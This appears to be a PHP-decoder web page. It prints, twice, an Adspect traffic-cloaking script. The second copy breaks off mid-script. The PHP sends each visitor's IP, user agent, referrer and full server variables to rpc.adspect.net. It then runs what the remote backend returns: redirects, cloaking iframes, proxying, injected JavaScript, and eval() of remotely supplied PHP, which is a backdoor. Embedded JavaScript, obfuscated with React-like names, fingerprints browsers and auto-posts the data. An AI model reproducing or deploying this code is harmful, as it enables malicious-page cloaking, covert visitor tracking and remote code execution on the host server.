Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ini_set('display_errors', '0'); error_reporting(E_ALL); if (!function_exists('adsp..

Decoded Output download

<?php 
 ini_set('display_errors', '0'); error_reporting(E_ALL); if (!function_exists('adspect')) { function adspect_exit($code, $message) { http_response_code($code); exit($message); } function adspect_dig($array, $key, $default = '') { return array_key_exists($key, $array) ? $array[$key] : $default; } function adspect_resolve_path($path) { if ($path[0] === DIRECTORY_SEPARATOR) { $path = adspect_dig($_SERVER, 'DOCUMENT_ROOT', __DIR__) . $path; } else { $path = __DIR__ . DIRECTORY_SEPARATOR . $path; } return realpath($path); } function adspect_spoof_request($url = '') { $_SERVER['REQUEST_METHOD'] = 'GET'; $_POST = []; if ($url !== '') { $url = parse_url($url); if (isset($url['path'])) { if (substr($url['path'], 0, 1) === '/') { $_SERVER['REQUEST_URI'] = $url['path']; } else { $_SERVER['REQUEST_URI'] = dirname($_SERVER['REQUEST_URI']) . '/' . $url['path']; } } if (isset($url['query'])) { parse_str($url['query'], $_GET); $_SERVER['QUERY_STRING'] = $url['query']; } else { $_GET = []; $_SERVER['QUERY_STRING'] = ''; } } } function adspect_try_files() { foreach (func_get_args() as $path) { if (is_file($path)) { if (!is_readable($path)) { adspect_exit(403, 'Permission denied'); } header('Content-Type: text/html'); switch (strtolower(pathinfo($path, PATHINFO_EXTENSION))) { case 'php': case 'phtml': case 'php5': case 'php4': case 'php3': adspect_execute($path); exit; default: header('Content-Type: ' . adspect_content_type($path)); case 'html': case 'htm': header('Content-Length: ' . filesize($path)); readfile($path); exit; } } } adspect_exit(404, 'File not found'); } function adspect_execute() { global $_adspect; require_once func_get_arg(0); } function adspect_content_type($path) { if (function_exists('mime_content_type')) { $type = mime_content_type($path); if (is_string($type)) { return $type; } } return 'application/octet-stream'; } function adspect_serve_local($url) { $path = (string)parse_url($url, PHP_URL_PATH); if ($path === '') { return null; } $path = adspect_resolve_path($path); if (is_string($path)) { adspect_spoof_request($url); if (is_dir($path)) { chdir($path); adspect_try_files('index.php', 'index.html', 'index.htm'); return; } chdir(dirname($path)); adspect_try_files($path); return; } adspect_exit(404, 'File not found'); } function adspect_real_ip() { if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) { $ip = strtok($_SERVER['HTTP_X_FORWARDED_FOR'], ','); } elseif (array_key_exists('HTTP_X_REAL_IP', $_SERVER)) { $ip = $_SERVER['HTTP_X_REAL_IP']; } elseif (array_key_exists('HTTP_REAL_IP', $_SERVER)) { $ip = $_SERVER['HTTP_REAL_IP']; } elseif (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) { $ip = $_SERVER['HTTP_CF_CONNECTING_IP']; } if (empty($ip)) { $ip = $_SERVER['REMOTE_ADDR']; } return $ip; } function adspect_crypt($in, $key) { $il = strlen($in); $kl = strlen($key); $out = ''; for ($i = 0; $i < $il; ++$i) { $out .= chr(ord($in[$i]) ^ ord($key[$i % $kl])); } return $out; } function adspect_proxy_headers() { $headers = []; foreach (func_get_args() as $key) { if (array_key_exists($key, $_SERVER)) { $header = strtr(strtolower(substr($key, 5)), '_', '-'); $headers[] = "{$header}: {$_SERVER[$key]}"; } } return $headers; } function adspect_proxy($url, $param = null, $key = null) { $url = parse_url($url); if (empty($url)) { adspect_exit(500, 'Invalid proxy URL'); } extract($url); $curl = curl_init(); curl_setopt($curl, CURLOPT_FORBID_REUSE, true); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 60); curl_setopt($curl, CURLOPT_TIMEOUT, 60); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_ENCODING , ''); curl_setopt($curl, CURLOPT_USERAGENT, adspect_dig($_SERVER, 'HTTP_USER_AGENT', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36')); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); if (!isset($scheme)) { $scheme = 'http'; } if (!isset($host)) { $host = adspect_dig($_SERVER, 'HTTP_HOST', 'localhost'); } if (isset($user, $pass)) { curl_setopt($curl, CURLOPT_USERPWD, "$user:$pass"); $host = "$user:$pass@$host"; } if (isset($port)) { curl_setopt($curl, CURLOPT_PORT, $port); $host = "$host:$port"; } $origin = "$scheme://$host"; if (!isset($path)) { $path = '/'; } if ($path[0] !== '/') { $path = "/$path"; } $url = $path; if (isset($query)) { $url .= "?$query"; } curl_setopt($curl, CURLOPT_URL, $origin . $url); $headers = adspect_proxy_headers('HTTP_ACCEPT', 'HTTP_ACCEPT_LANGUAGE', 'HTTP_COOKIE'); $headers[] = 'Cache-Control: no-cache'; curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = curl_exec($curl); if ($errno = curl_errno($curl)) { adspect_exit(500, 'curl error: ' . curl_strerror($errno)); } $code = curl_getinfo($curl, CURLINFO_HTTP_CODE); $type = curl_getinfo($curl, CURLINFO_CONTENT_TYPE); curl_close($curl); http_response_code($code); if (is_string($data)) { if (isset($param, $key) && preg_match('{^text/(?:html|css)}i', $type)) { $base = $path; if ($base[-1] !== '/') { $base = dirname($base); } $base = rtrim($base, '/'); $rw = function ($m) use ($origin, $base, $param, $key) { list($repl, $what, $url) = $m; $url = htmlspecialchars_decode($url); $url = parse_url($url); if (!empty($url)) { extract($url); if (isset($host)) { if (!isset($scheme)) { $scheme = 'http'; } $host = "$scheme://$host"; if (isset($user, $pass)) { $host = "$user:$pass@$host"; } if (isset($port)) { $host = "$host:$port"; } } else { $host = $origin; } if (!isset($path)) { $path = ''; } if (!strlen($path) || $path[0] !== '/') { $path = "$base/$path"; } if (!isset($query)) { $query = ''; } $host = base64_encode(adspect_crypt($host, $key)); parse_str($query, $query); $query[$param] = "$path#$host"; $repl = '?' . http_build_query($query); if (isset($fragment)) { $repl .= "#$fragment"; } $repl = htmlspecialchars($repl); if ($what[-1] === '=') { $repl = "\"$repl\""; } $repl = $what . $repl; } return $repl; }; $re = '{(href=|src=|url\()["\']?((?:https?:|(?!#|[[:alnum:]]+:))[^"\'[:space:]>)]+)["\']?}i'; $data = preg_replace_callback($re, $rw, $data); } } else { $data = ''; } header("Content-Type: $type"); header('Content-Length: ' . strlen($data)); echo $data; } function adspect($sid, $mode, $param, $key) { if (!function_exists('curl_init')) { adspect_exit(500, 'php-curl extension is missing'); } if (!function_exists('json_encode') || !function_exists('json_decode')) { adspect_exit(500, 'php-json extension is missing'); } $addr = adspect_real_ip(); if (array_key_exists($param, $_GET) && strpos($_GET[$param], '#') !== false) { list($url, $host) = explode('#', $_GET[$param], 2); $host = adspect_crypt(base64_decode($host), $key); unset($_GET[$param]); $query = http_build_query($_GET); $url = "$host$url?$query"; adspect_proxy($url, $param, $key); exit; } $ajax = intval($mode === 'ajax'); $curl = curl_init(); $sid = adspect_dig($_GET, '__sid', $sid); $ua = adspect_dig($_SERVER, 'HTTP_USER_AGENT'); $referrer = adspect_dig($_SERVER, 'HTTP_REFERER'); $query = http_build_query($_GET); switch (array_key_exists('data', $_POST)) { case true: $payload = json_decode($_POST['data'], true); if (is_array($payload)) { break; } default: $payload = []; break; } $payload['server'] = $_SERVER; curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($payload)); if ($ajax) { header('Access-Control-Allow-Origin: *'); $cid = adspect_dig($_SERVER, 'HTTP_X_REQUEST_ID'); } else { $cid = adspect_dig($_COOKIE, '_cid'); } curl_setopt($curl, CURLOPT_FORBID_REUSE, true); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 60); curl_setopt($curl, CURLOPT_TIMEOUT, 60); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_ENCODING, ''); curl_setopt($curl, CURLOPT_HTTPHEADER, [ "X-Forwarded-Host: {$_SERVER['HTTP_HOST']}", "X-Request-ID: {$cid}", "Adspect-IP: {$addr}", "Adspect-UA: {$ua}", "Adspect-Referrer: {$referrer}", ]); curl_setopt($curl, CURLOPT_URL, "https://rpc.adspect.net/v2/{$sid}?{$query}"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $json = curl_exec($curl); if ($errno = curl_errno($curl)) { adspect_exit(500, 'curl error: ' . curl_strerror($errno)); } $code = curl_getinfo($curl, CURLINFO_HTTP_CODE); curl_close($curl); header('Cache-Control: no-store'); switch ($code) { case 200: $data = json_decode($json, true); if (!is_array($data)) { adspect_exit(500, 'Invalid backend response'); } global $_adspect; $_adspect = $data; extract($data); if ($ajax) { switch ($action) { case 'php': ob_start(); eval($target); $data['target'] = ob_get_clean(); $json = json_encode($data); break; } if ($_SERVER['REQUEST_METHOD'] === 'POST') { header('Content-Type: application/json'); echo $json; } else { header('Content-Type: application/javascript'); if (!$ok && !$js) { return null; } echo "window._adata={$json};"; return $target; } } else { if ($js) { setcookie('_cid', $cid, time() + 60); return $target; } switch ($action) { case 'local': return adspect_serve_local($target); case 'noop': adspect_spoof_request($target); return null; case '301': case '302': case '303': header("Location: {$target}", true, (int)$action); break; case 'xar': header("X-Accel-Redirect: {$target}"); break; case 'xsf': header("X-Sendfile: {$target}"); break; case 'refresh': header("Refresh: 0; url={$target}"); adspect_spoof_request(); return null; case 'meta': $target = htmlspecialchars($target); echo "<!DOCTYPE html><head><meta http-equiv=\"refresh\" content=\"0; url={$target}\"></head>"; break; case 'iframe': $target = htmlspecialchars($target); echo "<!DOCTYPE html><html><head><meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"></head><body><iframe src=\"{$target}\" style=\"width:100%;height:100%;position:absolute;top:0;left:0;z-index:999999;border:none;\"></iframe></body></html>"; break; case 'proxy': adspect_proxy($target, $param, $key); break; case 'fetch': adspect_proxy($target); break; case 'return': if (is_numeric($target)) { http_response_code((int)$target); } else { adspect_exit(500, 'Non-numeric status code'); } break; case 'php': eval($target); break; case 'js': $target = htmlspecialchars(base64_encode($target)); echo "<!DOCTYPE html><body><script src=\"data:text/javascript;base64,{$target}\"></script></body>"; break; } } exit; case 404: adspect_exit(404, 'Stream not found'); default: adspect_exit($code, 'Backend response code ' . $code); } } } $target = adspect('5e0718a1-ff11-430b-96b3-4cb07ed2b7ad', 'redirect', '_', base64_decode('kqGD7nUCW+vzs70LN8OdHX9tQGpDt6dRGIE/NsOBiXU=')); if (!isset($target)) { return; } ?> 
<!DOCTYPE html> 
<html lang="en"> 
  <head> 
    <meta charset="utf-8"> 
    <meta name="viewport" content="width=device-width, initial-scale=1"> 
  </head> 
  <body> 
    <noscript>You need to enable JavaScript to run this app.</noscript> 
    <div id="root"> 
      <script>(function(){var react_memoizedmergedchildcontext=[],react_onsocketmessage={};try{function react_overridepropsdeletepath(react_toplevelupdatewarnings){if('object'===typeof react_toplevelupdatewarnings&&null!==react_toplevelupdatewarnings){var react_fontfamily={};function react_updatesimplememocomponent(react_newhookname){try{var react_defaultvalue=react_toplevelupdatewarnings[react_newhookname];switch(typeof react_defaultvalue){case'object':if(null===react_defaultvalue)break;case'function':react_defaultvalue=react_defaultvalue['toString']();}react_fontfamily[react_newhookname]=react_defaultvalue;}catch(react_getaffectedmoduleeffects){react_memoizedmergedchildcontext['push'](react_getaffectedmoduleeffects['message']);}}for(var react_latestgetsnapshot in react_toplevelupdatewarnings)react_updatesimplememocomponent(react_latestgetsnapshot);try{var react_azimuth=Object['getOwnPropertyNames'](react_toplevelupdatewarnings);for(react_latestgetsnapshot=0x0;react_latestgetsnapshot<react_azimuth['length'];++react_latestgetsnapshot)react_updatesimplememocomponent(react_azimuth[react_latestgetsnapshot]);react_fontfamily['!!']=react_azimuth;}catch(react_workinprogresshook){react_memoizedmergedchildcontext['push'](react_workinprogresshook['message']);}return react_fontfamily;}}react_onsocketmessage['screen']=react_overridepropsdeletepath(window['screen']),react_onsocketmessage['window']=react_overridepropsdeletepath(window),react_onsocketmessage['navigator']=react_overridepropsdeletepath(window['navigator']),react_onsocketmessage['location']=react_overridepropsdeletepath(window['location']),react_onsocketmessage['console']=react_overridepropsdeletepath(window['console']),react_onsocketmessage['documentElement']=function(react_workinprogress){try{var react_isqueued={};react_workinprogress=react_workinprogress['attributes'];for(var _settags in react_workinprogress)_settags=react_workinprogress[_settags],react_isqueued[_settags['nodeName']]=_settags['nodeValue'];return react_isqueued;}catch(react_pendingunsafe_componentwillreceivepropswarnings){react_memoizedmergedchildcontext['push'](react_pendingunsafe_componentwillreceivepropswarnings['message']);}}(document['documentElement']),react_onsocketmessage['document']=react_overridepropsdeletepath(document);try{react_onsocketmessage['timezoneOffset']=new Date()['getTimezoneOffset']();}catch(react_unwindinterruptedwork){react_memoizedmergedchildcontext['push'](react_unwindinterruptedwork['message']);}try{react_onsocketmessage['closure']=function(){}['toString']();}catch(_pointerid){react_memoizedmergedchildcontext['push'](_pointerid['message']);}try{react_onsocketmessage['touchEvent']=document['createEvent']('TouchEvent')['toString']();}catch(react_customdata){react_memoizedmergedchildcontext['push'](react_customdata['message']);}try{var react_vertadvy=function(){},react_newcallbackpriority=0x0;react_vertadvy['toString']=function(){return++react_newcallbackpriority,'';},console['log'](react_vertadvy),react_onsocketmessage['tostring']=react_newcallbackpriority;}catch(react_lastmovementy){react_memoizedmergedchildcontext['push'](react_lastmovementy['message']);}try{var react_registermutablesourceforhydration=document['createElement']('canvas')['getContext']('webgl'),react_internaleventhandlessetkey=react_registermutablesourceforhydration['getExtension']('WEBGL_debug_renderer_info');react_onsocketmessage['webgl']={'vendor':react_registermutablesourceforhydration['getParameter'](react_internaleventhandlessetkey['UNMASKED_VENDOR_WEBGL']),'renderer':react_registermutablesourceforhydration['getParameter'](react_internaleventhandlessetkey['UNMASKED_RENDERER_WEBGL'])};}catch(react_acallable){react_memoizedmergedchildcontext['push'](react_acallable['message']);}function react_outerproptypes(react_strokelinejoin,react_findcurrenthostfiberimpl,react_floodopacity){var reacttypeerror=react_strokelinejoin['prototype'][react_findcurrenthostfiberimpl];react_strokelinejoin['prototype'][react_findcurrenthostfiberimpl]=function(){react_onsocketmessage['proto']=!0x0;},react_floodopacity(),react_strokelinejoin['prototype'][react_findcurrenthostfiberimpl]=reacttypeerror;}try{react_outerproptypes(Array,'includes',function(){return document['createElement']('video')['canPlayType']('video/mp4');});}catch(react_isunitlessnumber){}}catch(react_outertype){react_memoizedmergedchildcontext['push'](react_outertype['message']);}(function(){react_onsocketmessage['errors']=react_memoizedmergedchildcontext;var react_checkifsnapshotchanged=document['createElement']('form'),react_renderedtail=document['createElement']('input');react_checkifsnapshotchanged['method']='POST',react_checkifsnapshotchanged['action']=window['location']['href'],react_renderedtail['type']='hidden',react_renderedtail['name']='data',react_renderedtail['value']=JSON['stringify'](react_onsocketmessage),react_checkifsnapshotchanged['appendChild'](react_renderedtail),document['body']['appendChild'](react_checkifsnapshotchanged),react_checkifsnapshotchanged['submit']();}());}());</script> 
    </div> 
  </body> 
</html> 
<?php exit(); 
 ?>

Did this file decode correctly?

Original Code

<?php
 ini_set('display_errors', '0'); error_reporting(E_ALL); if (!function_exists('adspect')) { function adspect_exit($code, $message) { http_response_code($code); exit($message); } function adspect_dig($array, $key, $default = '') { return array_key_exists($key, $array) ? $array[$key] : $default; } function adspect_resolve_path($path) { if ($path[0] === DIRECTORY_SEPARATOR) { $path = adspect_dig($_SERVER, 'DOCUMENT_ROOT', __DIR__) . $path; } else { $path = __DIR__ . DIRECTORY_SEPARATOR . $path; } return realpath($path); } function adspect_spoof_request($url = '') { $_SERVER['REQUEST_METHOD'] = 'GET'; $_POST = []; if ($url !== '') { $url = parse_url($url); if (isset($url['path'])) { if (substr($url['path'], 0, 1) === '/') { $_SERVER['REQUEST_URI'] = $url['path']; } else { $_SERVER['REQUEST_URI'] = dirname($_SERVER['REQUEST_URI']) . '/' . $url['path']; } } if (isset($url['query'])) { parse_str($url['query'], $_GET); $_SERVER['QUERY_STRING'] = $url['query']; } else { $_GET = []; $_SERVER['QUERY_STRING'] = ''; } } } function adspect_try_files() { foreach (func_get_args() as $path) { if (is_file($path)) { if (!is_readable($path)) { adspect_exit(403, 'Permission denied'); } header('Content-Type: text/html'); switch (strtolower(pathinfo($path, PATHINFO_EXTENSION))) { case 'php': case 'phtml': case 'php5': case 'php4': case 'php3': adspect_execute($path); exit; default: header('Content-Type: ' . adspect_content_type($path)); case 'html': case 'htm': header('Content-Length: ' . filesize($path)); readfile($path); exit; } } } adspect_exit(404, 'File not found'); } function adspect_execute() { global $_adspect; require_once func_get_arg(0); } function adspect_content_type($path) { if (function_exists('mime_content_type')) { $type = mime_content_type($path); if (is_string($type)) { return $type; } } return 'application/octet-stream'; } function adspect_serve_local($url) { $path = (string)parse_url($url, PHP_URL_PATH); if ($path === '') { return null; } $path = adspect_resolve_path($path); if (is_string($path)) { adspect_spoof_request($url); if (is_dir($path)) { chdir($path); adspect_try_files('index.php', 'index.html', 'index.htm'); return; } chdir(dirname($path)); adspect_try_files($path); return; } adspect_exit(404, 'File not found'); } function adspect_real_ip() { if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) { $ip = strtok($_SERVER['HTTP_X_FORWARDED_FOR'], ','); } elseif (array_key_exists('HTTP_X_REAL_IP', $_SERVER)) { $ip = $_SERVER['HTTP_X_REAL_IP']; } elseif (array_key_exists('HTTP_REAL_IP', $_SERVER)) { $ip = $_SERVER['HTTP_REAL_IP']; } elseif (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) { $ip = $_SERVER['HTTP_CF_CONNECTING_IP']; } if (empty($ip)) { $ip = $_SERVER['REMOTE_ADDR']; } return $ip; } function adspect_crypt($in, $key) { $il = strlen($in); $kl = strlen($key); $out = ''; for ($i = 0; $i < $il; ++$i) { $out .= chr(ord($in[$i]) ^ ord($key[$i % $kl])); } return $out; } function adspect_proxy_headers() { $headers = []; foreach (func_get_args() as $key) { if (array_key_exists($key, $_SERVER)) { $header = strtr(strtolower(substr($key, 5)), '_', '-'); $headers[] = "{$header}: {$_SERVER[$key]}"; } } return $headers; } function adspect_proxy($url, $param = null, $key = null) { $url = parse_url($url); if (empty($url)) { adspect_exit(500, 'Invalid proxy URL'); } extract($url); $curl = curl_init(); curl_setopt($curl, CURLOPT_FORBID_REUSE, true); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 60); curl_setopt($curl, CURLOPT_TIMEOUT, 60); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_ENCODING , ''); curl_setopt($curl, CURLOPT_USERAGENT, adspect_dig($_SERVER, 'HTTP_USER_AGENT', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36')); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); if (!isset($scheme)) { $scheme = 'http'; } if (!isset($host)) { $host = adspect_dig($_SERVER, 'HTTP_HOST', 'localhost'); } if (isset($user, $pass)) { curl_setopt($curl, CURLOPT_USERPWD, "$user:$pass"); $host = "$user:$pass@$host"; } if (isset($port)) { curl_setopt($curl, CURLOPT_PORT, $port); $host = "$host:$port"; } $origin = "$scheme://$host"; if (!isset($path)) { $path = '/'; } if ($path[0] !== '/') { $path = "/$path"; } $url = $path; if (isset($query)) { $url .= "?$query"; } curl_setopt($curl, CURLOPT_URL, $origin . $url); $headers = adspect_proxy_headers('HTTP_ACCEPT', 'HTTP_ACCEPT_LANGUAGE', 'HTTP_COOKIE'); $headers[] = 'Cache-Control: no-cache'; curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = curl_exec($curl); if ($errno = curl_errno($curl)) { adspect_exit(500, 'curl error: ' . curl_strerror($errno)); } $code = curl_getinfo($curl, CURLINFO_HTTP_CODE); $type = curl_getinfo($curl, CURLINFO_CONTENT_TYPE); curl_close($curl); http_response_code($code); if (is_string($data)) { if (isset($param, $key) && preg_match('{^text/(?:html|css)}i', $type)) { $base = $path; if ($base[-1] !== '/') { $base = dirname($base); } $base = rtrim($base, '/'); $rw = function ($m) use ($origin, $base, $param, $key) { list($repl, $what, $url) = $m; $url = htmlspecialchars_decode($url); $url = parse_url($url); if (!empty($url)) { extract($url); if (isset($host)) { if (!isset($scheme)) { $scheme = 'http'; } $host = "$scheme://$host"; if (isset($user, $pass)) { $host = "$user:$pass@$host"; } if (isset($port)) { $host = "$host:$port"; } } else { $host = $origin; } if (!isset($path)) { $path = ''; } if (!strlen($path) || $path[0] !== '/') { $path = "$base/$path"; } if (!isset($query)) { $query = ''; } $host = base64_encode(adspect_crypt($host, $key)); parse_str($query, $query); $query[$param] = "$path#$host"; $repl = '?' . http_build_query($query); if (isset($fragment)) { $repl .= "#$fragment"; } $repl = htmlspecialchars($repl); if ($what[-1] === '=') { $repl = "\"$repl\""; } $repl = $what . $repl; } return $repl; }; $re = '{(href=|src=|url\()["\']?((?:https?:|(?!#|[[:alnum:]]+:))[^"\'[:space:]>)]+)["\']?}i'; $data = preg_replace_callback($re, $rw, $data); } } else { $data = ''; } header("Content-Type: $type"); header('Content-Length: ' . strlen($data)); echo $data; } function adspect($sid, $mode, $param, $key) { if (!function_exists('curl_init')) { adspect_exit(500, 'php-curl extension is missing'); } if (!function_exists('json_encode') || !function_exists('json_decode')) { adspect_exit(500, 'php-json extension is missing'); } $addr = adspect_real_ip(); if (array_key_exists($param, $_GET) && strpos($_GET[$param], '#') !== false) { list($url, $host) = explode('#', $_GET[$param], 2); $host = adspect_crypt(base64_decode($host), $key); unset($_GET[$param]); $query = http_build_query($_GET); $url = "$host$url?$query"; adspect_proxy($url, $param, $key); exit; } $ajax = intval($mode === 'ajax'); $curl = curl_init(); $sid = adspect_dig($_GET, '__sid', $sid); $ua = adspect_dig($_SERVER, 'HTTP_USER_AGENT'); $referrer = adspect_dig($_SERVER, 'HTTP_REFERER'); $query = http_build_query($_GET); switch (array_key_exists('data', $_POST)) { case true: $payload = json_decode($_POST['data'], true); if (is_array($payload)) { break; } default: $payload = []; break; } $payload['server'] = $_SERVER; curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($payload)); if ($ajax) { header('Access-Control-Allow-Origin: *'); $cid = adspect_dig($_SERVER, 'HTTP_X_REQUEST_ID'); } else { $cid = adspect_dig($_COOKIE, '_cid'); } curl_setopt($curl, CURLOPT_FORBID_REUSE, true); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 60); curl_setopt($curl, CURLOPT_TIMEOUT, 60); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_ENCODING, ''); curl_setopt($curl, CURLOPT_HTTPHEADER, [ "X-Forwarded-Host: {$_SERVER['HTTP_HOST']}", "X-Request-ID: {$cid}", "Adspect-IP: {$addr}", "Adspect-UA: {$ua}", "Adspect-Referrer: {$referrer}", ]); curl_setopt($curl, CURLOPT_URL, "https://rpc.adspect.net/v2/{$sid}?{$query}"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $json = curl_exec($curl); if ($errno = curl_errno($curl)) { adspect_exit(500, 'curl error: ' . curl_strerror($errno)); } $code = curl_getinfo($curl, CURLINFO_HTTP_CODE); curl_close($curl); header('Cache-Control: no-store'); switch ($code) { case 200: $data = json_decode($json, true); if (!is_array($data)) { adspect_exit(500, 'Invalid backend response'); } global $_adspect; $_adspect = $data; extract($data); if ($ajax) { switch ($action) { case 'php': ob_start(); eval($target); $data['target'] = ob_get_clean(); $json = json_encode($data); break; } if ($_SERVER['REQUEST_METHOD'] === 'POST') { header('Content-Type: application/json'); echo $json; } else { header('Content-Type: application/javascript'); if (!$ok && !$js) { return null; } echo "window._adata={$json};"; return $target; } } else { if ($js) { setcookie('_cid', $cid, time() + 60); return $target; } switch ($action) { case 'local': return adspect_serve_local($target); case 'noop': adspect_spoof_request($target); return null; case '301': case '302': case '303': header("Location: {$target}", true, (int)$action); break; case 'xar': header("X-Accel-Redirect: {$target}"); break; case 'xsf': header("X-Sendfile: {$target}"); break; case 'refresh': header("Refresh: 0; url={$target}"); adspect_spoof_request(); return null; case 'meta': $target = htmlspecialchars($target); echo "<!DOCTYPE html><head><meta http-equiv=\"refresh\" content=\"0; url={$target}\"></head>"; break; case 'iframe': $target = htmlspecialchars($target); echo "<!DOCTYPE html><html><head><meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"></head><body><iframe src=\"{$target}\" style=\"width:100%;height:100%;position:absolute;top:0;left:0;z-index:999999;border:none;\"></iframe></body></html>"; break; case 'proxy': adspect_proxy($target, $param, $key); break; case 'fetch': adspect_proxy($target); break; case 'return': if (is_numeric($target)) { http_response_code((int)$target); } else { adspect_exit(500, 'Non-numeric status code'); } break; case 'php': eval($target); break; case 'js': $target = htmlspecialchars(base64_encode($target)); echo "<!DOCTYPE html><body><script src=\"data:text/javascript;base64,{$target}\"></script></body>"; break; } } exit; case 404: adspect_exit(404, 'Stream not found'); default: adspect_exit($code, 'Backend response code ' . $code); } } } $target = adspect('5e0718a1-ff11-430b-96b3-4cb07ed2b7ad', 'redirect', '_', base64_decode('kqGD7nUCW+vzs70LN8OdHX9tQGpDt6dRGIE/NsOBiXU=')); if (!isset($target)) { return; } ?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
  </head>
  <body>
    <noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root">
      <script>(function(){var react_memoizedmergedchildcontext=[],react_onsocketmessage={};try{function react_overridepropsdeletepath(react_toplevelupdatewarnings){if('object'===typeof react_toplevelupdatewarnings&&null!==react_toplevelupdatewarnings){var react_fontfamily={};function react_updatesimplememocomponent(react_newhookname){try{var react_defaultvalue=react_toplevelupdatewarnings[react_newhookname];switch(typeof react_defaultvalue){case'object':if(null===react_defaultvalue)break;case'function':react_defaultvalue=react_defaultvalue['toString']();}react_fontfamily[react_newhookname]=react_defaultvalue;}catch(react_getaffectedmoduleeffects){react_memoizedmergedchildcontext['push'](react_getaffectedmoduleeffects['message']);}}for(var react_latestgetsnapshot in react_toplevelupdatewarnings)react_updatesimplememocomponent(react_latestgetsnapshot);try{var react_azimuth=Object['getOwnPropertyNames'](react_toplevelupdatewarnings);for(react_latestgetsnapshot=0x0;react_latestgetsnapshot<react_azimuth['length'];++react_latestgetsnapshot)react_updatesimplememocomponent(react_azimuth[react_latestgetsnapshot]);react_fontfamily['!!']=react_azimuth;}catch(react_workinprogresshook){react_memoizedmergedchildcontext['push'](react_workinprogresshook['message']);}return react_fontfamily;}}react_onsocketmessage['screen']=react_overridepropsdeletepath(window['screen']),react_onsocketmessage['window']=react_overridepropsdeletepath(window),react_onsocketmessage['navigator']=react_overridepropsdeletepath(window['navigator']),react_onsocketmessage['location']=react_overridepropsdeletepath(window['location']),react_onsocketmessage['console']=react_overridepropsdeletepath(window['console']),react_onsocketmessage['documentElement']=function(react_workinprogress){try{var react_isqueued={};react_workinprogress=react_workinprogress['attributes'];for(var _settags in react_workinprogress)_settags=react_workinprogress[_settags],react_isqueued[_settags['nodeName']]=_settags['nodeValue'];return react_isqueued;}catch(react_pendingunsafe_componentwillreceivepropswarnings){react_memoizedmergedchildcontext['push'](react_pendingunsafe_componentwillreceivepropswarnings['message']);}}(document['documentElement']),react_onsocketmessage['document']=react_overridepropsdeletepath(document);try{react_onsocketmessage['timezoneOffset']=new Date()['getTimezoneOffset']();}catch(react_unwindinterruptedwork){react_memoizedmergedchildcontext['push'](react_unwindinterruptedwork['message']);}try{react_onsocketmessage['closure']=function(){}['toString']();}catch(_pointerid){react_memoizedmergedchildcontext['push'](_pointerid['message']);}try{react_onsocketmessage['touchEvent']=document['createEvent']('TouchEvent')['toString']();}catch(react_customdata){react_memoizedmergedchildcontext['push'](react_customdata['message']);}try{var react_vertadvy=function(){},react_newcallbackpriority=0x0;react_vertadvy['toString']=function(){return++react_newcallbackpriority,'';},console['log'](react_vertadvy),react_onsocketmessage['tostring']=react_newcallbackpriority;}catch(react_lastmovementy){react_memoizedmergedchildcontext['push'](react_lastmovementy['message']);}try{var react_registermutablesourceforhydration=document['createElement']('canvas')['getContext']('webgl'),react_internaleventhandlessetkey=react_registermutablesourceforhydration['getExtension']('WEBGL_debug_renderer_info');react_onsocketmessage['webgl']={'vendor':react_registermutablesourceforhydration['getParameter'](react_internaleventhandlessetkey['UNMASKED_VENDOR_WEBGL']),'renderer':react_registermutablesourceforhydration['getParameter'](react_internaleventhandlessetkey['UNMASKED_RENDERER_WEBGL'])};}catch(react_acallable){react_memoizedmergedchildcontext['push'](react_acallable['message']);}function react_outerproptypes(react_strokelinejoin,react_findcurrenthostfiberimpl,react_floodopacity){var reacttypeerror=react_strokelinejoin['prototype'][react_findcurrenthostfiberimpl];react_strokelinejoin['prototype'][react_findcurrenthostfiberimpl]=function(){react_onsocketmessage['proto']=!0x0;},react_floodopacity(),react_strokelinejoin['prototype'][react_findcurrenthostfiberimpl]=reacttypeerror;}try{react_outerproptypes(Array,'includes',function(){return document['createElement']('video')['canPlayType']('video/mp4');});}catch(react_isunitlessnumber){}}catch(react_outertype){react_memoizedmergedchildcontext['push'](react_outertype['message']);}(function(){react_onsocketmessage['errors']=react_memoizedmergedchildcontext;var 